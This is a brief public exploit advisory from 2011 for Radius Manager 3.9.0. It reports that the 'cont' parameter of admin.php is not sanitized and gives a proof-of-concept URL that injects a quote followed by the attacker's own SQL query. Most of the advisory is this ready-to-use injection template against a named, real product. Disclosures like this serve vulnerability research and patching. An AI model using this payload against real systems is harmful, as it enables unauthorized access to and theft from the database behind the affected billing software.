Radius Manager version 3.9.0 suffers from a remote SQL injection vulnerability.
d7465d1cae603ceb6c99ab6cb16dcc593475dfd9122a239007bd547a0423fc45
# Exploit Title: Radius Manager V3.9.0 Sql Injection
# Date: 16-10-2011
# Author: Mehdi Boukazoula
# Software Link: http://www.dmasoftlab.com
# Version: v 3.9.0
# Tested on: v 3.9.0 with Postgresql, PHP 5.2.6, Apache 2.2.8,
# Description : In the page of "http://127.0.0.1/admin.php" the parameter "cont" is not sanitized ,that make malicious user comunicate with the database server directely .
--------------------------------------------------------------------------------------------------------
# Code of exploit :
in the browser (FingerPrint PoC) URL :
http://HOST/admin.php?cont=cont=search_invoices'YOUR SQL QUERIE